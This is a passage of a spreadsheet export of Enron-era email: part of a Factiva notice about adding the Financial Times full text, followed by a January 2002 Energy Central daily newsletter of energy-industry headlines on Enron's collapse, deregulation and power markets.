and CustomClips customers.  The FT will continue to be_x000D_
unavailable in Business Newsstand. The rollout of the full text of_x000D_
the FT complements Factiva's compelling content set of top must-read_x000D_
global business sources including The Wall Street Journal and_x000D_
Dow Jones, Reuters and AP Newswires. In addition, this unique_x000D_
source combination will be offered at launch in Factiva.com, our_x000D_
new flagship product._x000D_
_x000D_
The full text will replace the FT Abstracts. In order to provide_x000D_
you with uninterrupted coverage, the full text of all articles_x000D_
from June 1 on will be made available. The FT abstract archive_x000D_
to date will continue to be accessible to you as well._x000D_
_x000D_
This change will require no action on your part. The full text of_x000D_
the FT will have the same source codes that were previously applied_x000D_
to the FT Abstracts. This means your CustomClips folders and saved_x000D_
searches will automatically get this expanded content - and it will_x000D_
be available on day of publication to provide you with the most_x000D_
up-to-date global business information._x000D_
_x000D_
If you have any questions, please contact your account executive._x000D_
_x000D_
Regards,_x000D_
_x000D_
Greg Gerdy_x000D_
Vice President and Director, Product Management_x000D_
Factiva, a Dow Jones &amp; Reuters Company_x000D_
_x000D_
_x000D_
_______________________________________________________________________x000D_
This message was sent by Factiva, a Dow Jones &amp; Reuters company._x000D_
_x000D_
Click below to view our privacy policy:_x000D_
    http://www.factiva.com/legal/privacy.asp_x000D_
_x000D_
If you feel you have received this message in error,_x000D_
or if you wish to unsubscribe from this mailing list._x000D_
    http://factiva.rsc01.net/servlet/optout?MmODWEtHkRDoHpgFLgkhgDJhtE0_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 13 Jan 2002 15:23:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ecdirect-daily@mail.energycentral.com'})</t>
  </si>
  <si>
    <t>Energy Central Direct - Daily Edition</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
     Monday, January 14, 2002  KWI   [IMAGE] HOME  - CONTENT SELECTION   - =_x000D_
MEMBER SERVICES   - ADVERTISING   - PARTNERING   - CONTACT US      [IMAGE] =_x000D_
         [IMAGE]  IN THIS ISSUE     [IMAGE]   [IMAGE]    Daily Edition for =_x000D_
paul.d.thomas@enron.com  [IMAGE]     Electric Power News  Restructuring Tod=_x000D_
ay   Utility Spotlight  RER's eMetrix Load Forecast: CAL ISO   Electric Pow=_x000D_
er News - Top Stories  Electric Power News - Most Requested  Gas Industry N=_x000D_
ews - Top Stories           Selected Content Not In This Issue  Utility Sto=_x000D_
ck Price - Top Gainers - Each Tuesday         [IMAGE]  ELECTRIC POWER NEWS =_x000D_
    [IMAGE]   [IMAGE]  [IMAGE] [IMAGE] Selected 80 of 80  Articles Today!  =_x000D_
    THESE ARTICLES BROUGHT TO YOU BY     Come meet Excelergy's Stephen Prin=_x000D_
ce, Rick Nelson and Al West in New  Orleans at the premier energy informati=_x000D_
on technology event - Energy IT  Expo on January 14 &amp; 15 at the downtown Hy=_x000D_
att Regency. Excelergy is  pleased to be sponsoring the Energy Trading &amp; Ri=_x000D_
sk Management track.  Find out why American Electric Power runs its entire =_x000D_
power trading  operation using the Excelergy Energy Trading product - and b=_x000D_
e sure to  ask about new and exciting Excelergy developments in Risk Manage=_x000D_
ment!  For more details, contact Excelergy?s conference manager, Sarah Walk=_x000D_
er,  at 781-372-5013 or sarah.walker@excelergy.com. http://www.excelergy.co=_x000D_
m         Top Stories     Virginia Prepares for Deregulation of Electricity=_x000D_
 Market   By Greg Edwards, Richmond Times-Dispatch, Va., Jan. 12 Virginia i=_x000D_
s ready for electric competition, but competitors may find the going tough.=_x000D_
  [IMAGE]   Big power-price swings seen in store for Ontario   By Ian McKin=_x000D_
non, CALGARY, Alberta, Jan 11 (Reuters) Residents and businesses in Ontario=_x000D_
, Canada's richest and most populous province, can expect large swings in e=_x000D_
lectricity prices after its power industry is opened to competition in May,=_x000D_
 say observers of deregulation in Alberta and California.  [IMAGE]   Enron =_x000D_
Chooses Swiss Investment Bank's Bid on Its Trading Operations   By Tom Fowl=_x000D_
er, Houston Chronicle, Jan. 12 Enron chose an offer on Friday by Swiss inve=_x000D_
stment bank UBS to buy a majority stake in its trading operations, a move t=_x000D_
hat could jump-start the heart of the energy trading company.  [IMAGE]   Pl=_x000D_
ans to drop power projects worry San Francisco   By Leonard Anderson, SAN F=_x000D_
RANCISCO, Jan 11 (Reuters) Though no longer battling the daily power shorta=_x000D_
ges that dogged California last winter, state officials fear San Francisco'=_x000D_
s 800,000 residents could be left stranded if new electricity projects are =_x000D_
stalled.       Energy Security     State's Nuclear Plants Safe, Graham Says=_x000D_
   Jan 13 - Palm Beach Post U.S. Sen. Bob Graham said Monday there is no ne=_x000D_
ed for security forces at the nation's nuclear plants to be federalized.   =_x000D_
   California Crisis     San Diego Gas &amp; Electric Customers Could Pay Extra=_x000D_
 $242 Million   By Dan McSwain, North County Times, Escondido, Calif., Jan.=_x000D_
 11 San Diego Gas &amp; Electric said Wednesday that the bill to its customers =_x000D_
for California's power crisis would rise by an extra $242 million under a p=_x000D_
roposal released by the Public Utilities Commission.       California Moves=_x000D_
 to Pull Plug on Worst Power Contracts   By Carrie Peyton, The Sacramento B=_x000D_
ee, Calif., Jan. 10 The state has begun tough talks with more than half a d=_x000D_
ozen power sellers, trying to struggle free from the quicksand it was sucke=_x000D_
d into last year when it signed billions of dollars in long-term energy con=_x000D_
tracts.       California Attorney General Files Suit against Pacific Gas an=_x000D_
d Electric Corp.   By Dana Hull, San Jose Mercury News, Calif., Jan. 11 Sta=_x000D_
te Attorney General Bill Lockyer sued the PG?Corp. Thursday, claiming the p=_x000D_
arent company of California's largest utility drove its subsidiary into ban=_x000D_
kruptcy through fraud and deception.    [IMAGE] ADVERTISEMENT    ENERGIZE Y=_x000D_
OUR CAREER - The Energy Central Job Center has a new look,  new features, p=_x000D_
remier employers and is updated daily! Visit the energy  industry's largest=_x000D_
 on-line job center today:  http://www.energycentral.com/sections/jobs     =_x000D_
     Competition &amp; Deregulation     Report Lists Snags in Texas Electric De=_x000D_
regulation   By R.A. Dyer, Fort Worth Star-Telegram, Texas, Jan. 11 Incorre=_x000D_
ct data entries, service switching mistakes and missed communications conti=_x000D_
nue to hamper electric deregulation in Texas, according to the first report=_x000D_
 to state regulators since the market opened Jan. 1.       Dominion Virgini=_x000D_
a Power Offers Price for Residential Customers' Comparison   By Carolyn Sha=_x000D_
piro, Daily Press, Newport News, Va., Jan. 11 Any competing electricity com=_x000D_
pany that wants to sell service to Dominion Virginia Power residential cust=_x000D_
omers this year will have to beat the price of 3.7 cents per kilowatt-hour =_x000D_
to save those consumers money.       METI panel divided on extent of power =_x000D_
market liberalization   TOKYO, Jan 11, 2002 (Kyodo via COMTEX) --  Members =_x000D_
of an advisory body to the economy, trade and industry minister were divide=_x000D_
d at a meeting Friday over the extent to which Japan should further liberal=_x000D_
ize its power market, a ministry official said.       SUPPLIERS NOW KNOW PO=_x000D_
WER PRICE TO BEAT   Jan 12 - Roanoke Times &amp; World News American Electric P=_x000D_
ower Co. customers interested in shopping for electricity need to know how =_x000D_
to compare prices to see if they're getting a good deal.       Deregulation=_x000D_
 Saving Dp?Customers Money   Jan 11 - Dayton Daily News In the first year o=_x000D_
f electric deregulation, more than 600,000 Ohioans found new suppliers of c=_x000D_
heaper power, but none of those customers were in the Dayton area.       MV=_x000D_
V head says deregulation is in danger   Jan 11, 2002, (Die Welt /FT Informa=_x000D_
tion via COMTEX) --  Roland Hartung, the board spokesman for MVV Energie AG=_x000D_
, the German energy company, fears that electricity prices could rise if de=_x000D_
regulation of the energy industry is not more clearer defined legally.     =_x000D_
 Mergers, Acquisitions &amp; Divestitures     Duluth, Minn.-Based Company Still=_x000D_
 Trying to Sell Florida Water Supplier   By Peter Passi, Duluth News-Tribun=_x000D_
e, Minn., Jan. 12 As a negotiations deadline loomed Friday, Duluth-based Al=_x000D_
lete still had not struck a deal to sell Florida Water Services, the larges=_x000D_
t investor-owned water supplier in the Sunshine State.       PG?National En=_x000D_
ergy May Sell Rhode Island, Massachusetts Facilities   By Timothy C. Barman=_x000D_
n, Providence Journal, R.I., Jan. 11 The company that owns the Manchester S=_x000D_
treet power plant is putting the huge facility up for sale, just three year=_x000D_
s after buying it.       Contact battle set to resume   Jan 11 - Dominion T=_x000D_
HE battle for Contact Energy is expected to resume next week as United Stat=_x000D_
es energy giant Edison Mission vies for control of the company.       EIL b=_x000D_
id to go to vote after release   Jan 12 - The Southland Times A bid by Elec=_x000D_
tricity Invercargill (EIL) for the Balclutha-based Otago Power company will=_x000D_
 be released to shareholders by the end of January.      Legislation/Regula=_x000D_
tion     Enron spread the wealth around Washington   WASHINGTON, Jan 12 (Re=_x000D_
uters) - Former energy-trading giant Enron Corp. not only lavished campaign=_x000D_
 donations on President George W. Bush, but was one of America's biggest po=_x000D_
litical contributors, spreading money across both parties on Capitol Hill. =_x000D_
      THE ENRON COLLAPSE / Scandal could taint White House   Jan 13 - San F=_x000D_
rancisco Chronicle As the White House scrambles to release information abou=_x000D_
t its contacts with energy giant Enron, it is fighting the perception that =_x000D_
the company bought its way into the Bush administration.       Enron Asked =_x000D_
Bush Administration for Help Calling Off Bankers   By Ken Moritsugu, Knight=_x000D_
 Ridder Washington Bureau, Jan. 12 As Enron Corp. tried to stave off financ=_x000D_
ial collapse last fall, the company's president asked a senior Bush adminis=_x000D_
tration official to call its bankers, the Treasury Department said Friday. =_x000D_
      U.S. Rep. Waxman seeks more data from Enron's Lay   WASHINGTON, Jan 1=_x000D_
2 (Reuters) A high-ranking House Democrat on Saturday asked Enron Corp. Cha=_x000D_
irman Kenneth Lay to provide details on communications between the company =_x000D_
and its employees last summer regarding the financial condition of Enron.  =_x000D_
    Rates     Missouri Regulators' Staff Recommends Utility Rate Decrease, =_x000D_
Not Increase   By Steve Everly, The Kansas City Star, Mo., Jan. 11 UtiliCor=_x000D_
p United's Missouri Public Service division should not get the rate increas=_x000D_
e it is seeking but instead should reduce the amount it charges customers, =_x000D_
according to a recommendation by the staff of state regulators.      Genera=_x000D_
l     Houston feds collected significant information on Enron   By C. Bryso=_x000D_
n Hull, HOUSTON, Jan. 11 (Reuters) The top federal prosecutor in Houston on=_x000D_
 Friday said his office had collected a significant amount of information a=_x000D_
bout the collapse of Enron Corp. before being recused from the case because=_x000D_
 of personal relationships with employees of the fallen energy trader.     =_x000D_
  Accounting Firm of Enron Corp. Admits to Destroying Relevant Documents   =_x000D_
By Laura Goldberg, Houston Chronicle, Jan. 12 Andersen, Enron Corp.'s audit=_x000D_
or, said Thursday its employees destroyed "a significant but undetermined n=_x000D_
umber" of electronic and paper documents in recent months relating to work =_x000D_
it did for the Houston-based company.       Virginia Regulatory Commission =_x000D_
Plans Reorganization   By Tom Shean, The Virginian-Pilot, Norfolk, Va., Jan=_x000D_
. 11 Virginia's most powerful regulatory agency is restructuring to become =_x000D_
more efficient and answer charges from critics.       Differing Versions in=_x000D_
 Enron Affair   By PETE YOSTA Associated Press Writer, WASHINGTON, Jan 11, =_x000D_
2002 (AP Online via COMTEX) -- Transformed in just one day from the nation'=_x000D_
s biggest bankruptcy to a major political controversy, some of the players =_x000D_
in the Enron affair are already giving conflicting versions of who said wha=_x000D_
t to whom.       Key dates in Enron's collapse   Jan 11 - San Francisco Chr=_x000D_
onicle Enron Corp., formed in 1985 and based in Houston, was the largest na=_x000D_
tural gas merchant in North America and the largest marketer of electricity=_x000D_
 in the United States before its collapse.       Morale falling faster than=_x000D_
 Enron stock / Enron's master of disaster   Jan 11 - San Francisco Chronicl=_x000D_
e Enron employees, whose retirement plans vanished amid the debris of the e=_x000D_
nergy giant's bankruptcy, are quietly pointing federal investigators toward=_x000D_
 the man they think most responsible for the fiasco: former Chief Executive=_x000D_
 Officer Jeffrey Skilling.       Amarillo, Texas, Panel Approves Incentives=_x000D_
 for Xcel Energy Facility Expansion   By Greg Rohloff, Amarillo Globe-News,=_x000D_
 Texas, Jan. 10 The Amarillo Economic Development Corp. board Wednesday app=_x000D_
roved a $750,000 grant to Xcel Energy to assist the power company with the =_x000D_
expansion of the company's customer-service center.      Power Pricing/Supp=_x000D_
ly     East Power Prices Buoyed by Reemerging Cold; Higher Loads   Jan. 11 =_x000D_
(Btu's Daily Power Report) Cold weather forecasted to resurface in the East=_x000D_
ern U.S. underpinned power markets exacerbating weekend jitters sending the=_x000D_
 premium for pre-weekend trading higher in the Northeast. Special Offer fro=_x000D_
m this Publisher!        Power Market Sedated by Hydro Ions   Jan. 11 (Spec=_x000D_
ial to Western Price Survey Contacts) Western power markets calmed to the p=_x000D_
oint of sedation this week, with peak prices falling below 20 mils/KWh thro=_x000D_
ughout the region and some off-peak transactions coming in the single digit=_x000D_
s. Special Offer from this Publisher!        Gas Pains   Jan. 11 (Energy Ma=_x000D_
rket Report) With the latest weather forecasts revising temperatures upward=_x000D_
 from the Arctic blast predicted on Tuesday and hydropower in the Northwest=_x000D_
 remaining strong, peak power prices for Friday and Saturday delivery gener=_x000D_
ally fell modestly across the WSCC. Special Offer from this Publisher!     =_x000D_
  Transmission &amp; Reliability     ACC Approves 345 KV Wires Project, Duke's =_x000D_
600 MW Arlington Plant   Jan. 13 (California Energy Markets) The Arizona Co=_x000D_
rporation Commission at a special open meeting on January 3 unanimously app=_x000D_
roved a transmission line proposed by Tucson Electric Power and Citizens Co=_x000D_
mmunications [L00000F-01-0111]. Special Offer from this Publisher!       Po=_x000D_
wer Projects     California Energy Panel Gives Favorable Word to Burbank's =_x000D_
Power-Plant Plan   By Helen Gao, Daily News, Los Angeles, Jan. 11 While a n=_x000D_
umber of companies and public entities have withdrawn applications to build=_x000D_
 new power plants, Burbank is moving steadily forward with its Magnolia Pow=_x000D_
er Project.       Kane County, Ill., Looks at Curbing Power Plants   By Wil=_x000D_
liam Grady, Chicago Tribune, Jan. 10 A proposed change to Kane County's zon=_x000D_
ing regulations would prevent power plants from being built in agricultural=_x000D_
 areas.       Proposed Power Plant Would Use Limestone Pits   Jan 11 - Palm=_x000D_
 Beach Post A $500 million natural gas power plant could one day rise from =_x000D_
the flat fields northwest of Wellington, offering power to Florida Power &amp; =_x000D_
Light customers and possibly helping with the Everglades restoration.      =_x000D_
 Work Continues on Power Plant in Autauga County, Ala.   By Nick Lackeos, M=_x000D_
ontgomery Advertiser, Ala., Jan. 8 "Elvis" gives a whole new meaning to mon=_x000D_
ster trucks.       Cherokee County, S.C., Council Endorses Power-Plant Plan=_x000D_
   By Julie Woodcock, Herald-Journal, Spartanburg, S.C., Jan. 8 Cherokee Co=_x000D_
unty Council passed a resolution Monday endorsing a plan to build a $100 mi=_x000D_
llion electrical power generation plant.      Legal     Chromium 6 Suits ag=_x000D_
ainst California Utility Giant Can Proceed, Judge Says   By Claire Cooper, =_x000D_
The Sacramento Bee, Calif., Jan. 10 A bankruptcy judge has rejected Pacific=_x000D_
 Gas and Electric Co.'s attempt to shield itself from 1,267 new state court=_x000D_
 claims over chromium 6, a cancer-causing water contaminant made infamous b=_x000D_
y the 2000 movie "Erin Brockovich."       Prosecutors Face Tough Challenges=_x000D_
 in Enron Investigation   Chicago Tribune, Jan. 11 Government attorneys fac=_x000D_
e major obstacles in their investigation of Enron Corp., legal experts say,=_x000D_
 and while prosecution is possible, it could take many months to find evide=_x000D_
nce of crime.       Enron Probe Could Complicate UBS Warburg's Attempts to =_x000D_
Sell Assets   By Melita Marie Garza, Chicago Tribune, Jan. 12 Even as inves=_x000D_
tment bank UBS Warburg won a bidding contest for Enron Corp.'s wholesale en=_x000D_
ergy trading business, legal experts said the widening criminal investigati=_x000D_
on of Enron could complicate the bankrupt company's efforts to sell off its=_x000D_
 remaining assets.      Renewables     Connecticut Agency's Enron Losses Ma=_x000D_
y Drive Up State's Garbage-Dumping Fees   By Ken Dixon, Connecticut Post, B=_x000D_
ridgeport, Jan. 11 Officials admit the state's garbage-to-energy agency may=_x000D_
 have lost up to $220 million invested with now-bankrupt Enron Corp., but c=_x000D_
an't say if losses will trigger higher trash disposal costs for communities=_x000D_
 that use their facilities.       Huge Irish windfarm finally gets go-ahead=_x000D_
   Jan 12 - The Belfast News Letter The Irish government today gave the go-=_x000D_
ahead for the world's biggest off-shore wind-generated power plant.       C=_x000D_
onditions for Relicensing Box Canyon too Pricey for PUD   Jan. 13 (Clearing=_x000D_
 Up) Conditions being attached to the relicensing of Pend Oreille PUD's Box=_x000D_
 Canyon Dam on the Pend Oreille River in the northeast corner of Washington=_x000D_
 have led the utility to say rates will go way up unless something gives.  =_x000D_
Special Offer from this Publisher!        TVA Mulling $50 Million 'wind far=_x000D_
m'   Jan 12, 2002 - KnoxNews.com TVA's first three windmills are spinning o=_x000D_
n Buffalo Mountain now as part of the agency's Green Power Switch Program, =_x000D_
which emphasizes nonpolluting energy generation.      Plants     N.M. Four =_x000D_
Corners 745-MW Unit 5 taken off line   LOS ANGELES, Jan 11 (Reuters) The 74=_x000D_
5-megawatt Unit 5 at the Four Corners plant in New Mexico has been taken do=_x000D_
wn for an overhaul and is expected to return to service in about two months=_x000D_
, a plant spokeswoman said on Friday.      People     Enron CEO Ken Lay res=_x000D_
igns from Compaq's board   NEW YORK, Jan 11 (Reuters) Ken Lay, chief execut=_x000D_
ive of troubled energy giant Enron Corp., stepped down from Compaq Computer=_x000D_
 Corp.'s board of directors on Dec. 31, a spokesman for the No. 2 personal-=_x000D_
computer maker said on Friday.       Justice Dept: Enron Funded Ashcroft   =_x000D_
By KAREN GULLO Associated Press Writer, WASHINGTON, Jan 11, 2002 (AP Online=_x000D_
 via COMTEX) -- Shortly after he was confirmed as attorney general, John As=_x000D_
hcroft was invited by Enron Corp. Chairman Kenneth Lay to speak at an exclu=_x000D_
sive meeting of corporate leaders, Justice Department officials said Friday=_x000D_
.       Bush and Enron chief rose out of the same circles of achievement   =_x000D_
By DEB RIECHMANN Associated Press Writer, WASHINGTON, Jan 12, 2002 (AP Worl=_x000D_
dStream via COMTEX) -- President George W. Bush bestowed the nickname "Kenn=_x000D_
y Boy" on embattled Enron executive Kenneth Lay back when the two were up-a=_x000D_
nd-comers in Texas.       Pennsylvania Public Utility Commission Promotes S=_x000D_
taffer to Executive Director   By David DeKok, The Patriot-News, Harrisburg=_x000D_
, Pa., Jan. 11 The state Public Utility Commission Thursday promoted from w=_x000D_
ithin to fill the key position of PUC executive director.       Robert Rubi=_x000D_
n disclosed as an Enron contact   WASHINGTON, Jan 12, 2002 (United Press In=_x000D_
ternational via COMTEX) --  A Senate panel probing energy conglomerate Enro=_x000D_
n Corp.'s sudden collapse sent a subpoena Friday to Texas Republican Sen. P=_x000D_
hil Gramm's wife, Wendy Gramm, panel sources confirmed.      Labor/Human Re=_x000D_
sources     Northern Indiana Utility Ready to Cut 250 Jobs, Union Says   By=_x000D_
 Keith Benman, South Bend Tribune, Ind., Jan. 12 Leaders of the union repre=_x000D_
senting more than 2,200 workers at Northern Indiana Public Service Co. (NIP=_x000D_
SCO) say the company is preparing to eliminate 250 to 300 jobs or about 10 =_x000D_
percent of its work force.       Enron Misled Employees on Stock   By PETE =_x000D_
YOST Associated Press Writer, Jan 12, 2002 (AP Online via COMTEX) -- In a p=_x000D_
air of e-mails to his employees in August, the chairman of now-bankrupt Enr=_x000D_
on touted the company's stock and declared that the energy trader giant's g=_x000D_
rowth "has never been more certain."       Dayton, Ohio, Power and Light Of=_x000D_
fers Severance Package to 150   By Jim Bohman, Dayton Daily News, Ohio, Jan=_x000D_
. 8 To cut more jobs, the Dayton Power and Light Co. is offering a voluntar=_x000D_
y separation package for up to 150 union employees, the company confirmed M=_x000D_
onday.      Environmental     Current, Former Owners of Upstate New York Po=_x000D_
wer Plants May Face Fines   By David Robinson, The Buffalo News, N.Y., Jan.=_x000D_
 11 The companies that have owned the coal-powered power plants in Dunkirk =_x000D_
and the Town of Tonawanda over the last half century could face penalties t=_x000D_
hat could reach tens of millions of dollars under a lawsuit filed Thursday =_x000D_
by the state for illegally pumping tons of dangerous chemicals into the air=_x000D_
 over the last two decades.       Washington Discusses Changes That Could R=_x000D_
elax Clean-Air Regulation   By Repps Hudson, St. Louis Post-Dispatch, Jan. =_x000D_
11 Possible changes in Clean Air Act enforcement could mean that older powe=_x000D_
r plants would not be updated to reduce emissions of pollutants, such as su=_x000D_
lfur dioxide, nitrogen oxides and soot.       BC Hydro Receives Bids to Red=_x000D_
uce Greenhouse Gases   Jan 11, 2002 (BNamericas.com via COMTEX) --  Canadia=_x000D_
n power company BC Hydro is receiving proposals for 5.5 million tonnes of g=_x000D_
reenhouse gas offsets, the company said in a statement.      Nuclear     Ne=_x000D_
vada Vows to Fight Yucca Mountain   Jan 11, 2002 - United Press Internation=_x000D_
al For 15 years Nevada has been preparing to launch a legal counterattack a=_x000D_
gainst the federal government's plans to create a central nuclear waste sto=_x000D_
rage facility in the state, and will likely be headed to court as soon as P=_x000D_
resident Bush gives the controversial project the green light, the state's =_x000D_
attorney general said Friday.       San Onofre, Calif., Nuclear Plant Secur=_x000D_
ity Warning about Disgruntled Employee   North County Times, Escondido, Cal=_x000D_
if., Jan. 11 Security officers were warned to watch for a fired maintenance=_x000D_
 worker soon after he called a former co-worker Friday and threatened to ki=_x000D_
ll "a bunch of people" at the San Onofre nuclear power facility, plant spok=_x000D_
esman Ray Golden said Wednesday.       Southern's Hatch nuclear plant licen=_x000D_
se renewed   WASHINGTON, Jan 11 (Reuters) The Nuclear Regulatory Commission=_x000D_
 said Friday it renewed the operating license of the Southern Co.'s Edwin H=_x000D_
atch nuclear power plant in Georgia for another 20 years.       New U-turn =_x000D_
on nuclear powerplant   Jan 11 - Mail on Sunday - London PLANS for a furthe=_x000D_
r nuclear power plant in Scotland have been revealed - just days after the =_x000D_
Government indicated it will shelve future atomic expansion.       Czech nu=_x000D_
clear plant starts up again after emergency shut-down   Jan 12, 2002 - Agen=_x000D_
ce France-Presse A glitch-plagued Czech nuclear power plant was started up =_x000D_
again on Saturday after a faulty generator caused it to be shut down in an =_x000D_
emergency the day before, a spokesman for the plant said.      Financial   =_x000D_
  Andersen's future at stake after Enron   NEW YORK, Jan 11 (Reuters) - And=_x000D_
ersen, once the creme de la creme of accounting firms, has been knocked to =_x000D_
its knees after a series of revelations about its audit of bankrupt energy =_x000D_
trader Enron Corp.       Mirant Seeks Lead Arranger For $750M Construction =_x000D_
Loan   Jan. 13 (Power Finance &amp; Risk) Atlanta-based Mirant has been taking =_x000D_
pitches for the lead bank slot on a possible $750 million non-recourse cons=_x000D_
truction loan. Special Offer from this Publisher!        Canadian State Inv=_x000D_
ites Bids For Jumbo IPO   Jan. 13 (Power Finance &amp; Risk) The Ontario govern=_x000D_
ment has asked banks to submit bids within the next two weeks for the lucra=_x000D_
tive lead underwriting mandate for its planned $5 billion initial public of=_x000D_
fering of state-owned utility Hydro One, the restructured Ontario Hydro, sa=_x000D_
y bankers familiar with the matter. Special Offer from this Publisher!     =_x000D_
   Prompted by Enron's Collapse, Administration to Review Pension, 401(k) R=_x000D_
ules   By Pamela Yip, The Dallas Morning News, Jan. 11 Reacting to the Enro=_x000D_
n debacle, President Bush on Thursday ordered his economic team to undertak=_x000D_
e a rare review of rules regulating company pensions and 401(k) plans.     =_x000D_
 Financial - Results     Allentown, Pa.-Based Utility PPL Corp. Lowers Earn=_x000D_
ings Expectations   By Benjamin Y. Lowe, The Philadelphia Inquirer, Jan. 11=_x000D_
 PPL Corp. joined a growing number of electric companies last week when it =_x000D_
lowered its 2001 and 2002 earnings projections and reduced the number of po=_x000D_
wer plants it planned to build.      International     Ukraine aims to priv=_x000D_
atise 12 utilities in H2   KIEV, Jan 11 (Reuters) Ukraine plans to hold pri=_x000D_
vatisation tenders to sell 12 electricity distributing companies in the sec=_x000D_
ond half of this year, Oleksander Bondar, head of the State Property Fund, =_x000D_
said on Friday.       Tractebel Interested in Egasa &amp; Egesur   Peru, Jan 11=_x000D_
, 2002 (BNamericas.com via COMTEX) --  Belgian power company Tractebel is i=_x000D_
nterested in participating in the privatization of Peruvian generators Egas=_x000D_
a and Egesur, as a way of increasing its presence in Peru's electricity mar=_x000D_
ket, said Klaus Huys, Tractebel representative and general manager of Eners=_x000D_
ur, the Peruvian generator controlled by the Belgian company.       Govt. t=_x000D_
o Step in to Try to Save Electrolima Next Week   Colombia, Jan 11, 2002 (BN=_x000D_
americas.com via COMTEX) --  Colombia's public services regulator (Superser=_x000D_
vicios) will intervene next week to try and save electricity distributor El=_x000D_
ectrolima, which serves more than 250,000 people in Tolima department, as d=_x000D_
ebts owned to generators have pushed the company's financial situation to a=_x000D_
 critical point.       Gas Natural suffers from rising electricity prices  =_x000D_
 Jan 11, 2002, (Expansion /FT Information via COMTEX) --  Spanish electrici=_x000D_
ty companies Endesa, Union Fenosa, Hidrocantabrico and Iberdrola were charg=_x000D_
ing a historic high of 15 eurocents (Pta25) per kilowatt hour of electricit=_x000D_
y yesterday.       Power play for switchers   By Karen Collier, Jan 12, 200=_x000D_
2 (Herald Sun - ABIX via COMTEX) -- Victorian electricity retailer, TXU, wi=_x000D_
ll launch a drive for electricity customers on 12 January 2002.       Power=_x000D_
 tariffs hike rejected   Jan 12, 2002 (The East African Standard/All Africa=_x000D_
 Global Media via COMTEX) --  A report recommending a hike in electricity t=_x000D_
ariffs was yesterday condemned.       Electricity Generating Companies Leav=_x000D_
e the Privatisation Program   Jan 11, 2002 - South American Business Inform=_x000D_
ation The Brazilian government has decided to create a new company, complet=_x000D_
ely publicly financed, called the Companhia de Energia e Desenvolvimento Hi=_x000D_
drico do Nordeste, which will be responsible for the supply of electrical e=_x000D_
nergy in the Northeast of the country and the management of water resources=_x000D_
.       Aneel Discontinues Mae   Jan 11, 2002 - South American Business Inf=_x000D_
ormation Aneel (Agencia Nacional de Energia Eletrica) is to define the rule=_x000D_
s for MBE (Mercado Brasileiro de Energia).       Revision of Power Act Is o=_x000D_
n   Jan 11, 2002 - Africa News Service The Ministry of Energy is undertakin=_x000D_
g the revision of the Electric Power Act (1997).       Kplc 'Must Raise Tar=_x000D_
iffs to Survive'   Jan 11, 2002 - Africa News Service Kenyans may soon have=_x000D_
 to dig deeper into their pockets to pay electricity bills if a consultant'=_x000D_
s draft report for the review of electricity tariffs is adopted.       Hous=_x000D_
eholds Face Rise in Electricity Costs   Jan 11, 2002 - Australasian Busines=_x000D_
s Intelligence Victorian consumers are unlikely to reap big benefits from r=_x000D_
etail contestability.       Authorities cut back power supply because of ba=_x000D_
d weather   Jan 12 - Associated Press Albania instituted stark cutbacks in =_x000D_
electricity Saturday after temperatures below freezing pushed power plants =_x000D_
to brink of collapse.   [IMAGE]     Powered by Energy Central   ? 2001 Cybe=_x000D_
rTech, Inc. All rights reserved.  More News        Top   Excelergy    [IMAG=_x000D_
E]  RESTRUCTURING TODAY      [IMAGE]   [IMAGE]  [IMAGE] [IMAGE] January 10,=_x000D_
 2002     Industrials back Va regulators on control by FERC      NRECA favo=_x000D_
rs tough treatment of those using market power      National merchant trans=_x000D_
mission group to form in Wash Beacon brokering Enron deals      Mich signs =_x000D_
up two large marketers      Can technology hold key to getting markets open=_x000D_
?      Waxman tries to embarrass George Bush with Enron      CORRECTION    =_x000D_
  Calif ISO turns to LMP to avoid market power      FPL to pump power into =_x000D_
Texas grid      Don't blame market for Enron's failure says Pa's Thomas    =_x000D_
  What a difference a  recession makes      PNM withdraws from  accord with=_x000D_
 Western        Powered By US Publishing   ? 2001 US Publishing. All Rights=_x000D_
 Reserved.  More Info     Top    [IMAGE]  UTILITY SPOTLIGHT     [IMAGE]   [=_x000D_
IMAGE]  [IMAGE] [IMAGE] January 14, 2002     Enron Scandal Grows As Anderse=_x000D_
n Says Staff Disposed of Documents      More Legal Battles Seen Likely In C=_x000D_
PUC, PG?Bankruptcy Dispute      D.C. Current -- Heat Rises on ?New Source R=_x000D_
eview? As Reforms Continue Taking Shape      D.C. Current -- EIA Issues Sho=_x000D_
rt-, Long-Term Forecasts      Communications &amp; PR -- Entergy Nuclear Northe=_x000D_
ast Tries Ad To Counter Indian Point Opposition      Communications &amp; PR --=_x000D_
 NEW YORK      Communications &amp; PR -- New York (Scottish Power)      Commun=_x000D_
ications &amp; PR -- ConEdison Solutions      Power Marketing -- Texas Deregula=_x000D_
tion Starts as Maine Looks Back on 2 Years with Choice      Natural Gas -- =_x000D_
FERC Judge Reopens Investigation Of El Paso CA Market Manipulation      Nat=_x000D_
ural Gas -- Western Arctic Gas Plan Advancing      Natural Gas -- Jacobs Jo=_x000D_
ins Dutch Upgrading Project        Powered By Utility Spotlight   ? 2001 Ut=_x000D_
ility Spotlight. All Rights Reserved.  More Info     Top    [IMAGE]  RER'S =_x000D_
EMETRIX LOAD FORECAST: CAL ISO     [IMAGE]   [IMAGE]  [IMAGE]  Actual and f=_x000D_
orecasted hourly load for CAL ISO.  [IMAGE]  CAL ISO Chart    Powered By RE=_x000D_
R   ? 2001 RER. All Rights Reserved.    Top    [IMAGE]  ABOUT ENERGY CENTRA=_x000D_
L DIRECT     [IMAGE]   [IMAGE]   ABOUT ENERGY CENTRAL DIRECT This e-mail su=_x000D_
mmary service is provided FREE to qualified professionals in the power indu=_x000D_
stry. This e-mail  summary may be redistributed provided it is kept in its =_x000D_
entirety.    * Click here  to change your preferences.   * Visit Member Ser=_x000D_
vices  to START,  STOP, or CHANGE FORMAT for all of your e-mail subscriptio=_x000D_
ns.    * To BEGIN receiving this service directly signup at www.enerycentra=_x000D_
l.com/sections/ecdirect/ .   * To STOP receiving this service  click here  =_x000D_
 or send a message to service@energycentral.com  or call Member Services at=_x000D_
 303-782-5510.   PRESS RELEASES Submit press releases and other news to pr@=_x000D_
energycentral.com .    SPONSORSHIP AND ADVERTISING For sponsorship or adver=_x000D_
tising info call sales at 303-782-5510.    TO DELIVER YOUR ARTICLES, PAPERS=_x000D_
, PROCEEDINGS OR MONOGRAPHS THROUGH ENERGY CENTRAL: Energy Central provides=_x000D_
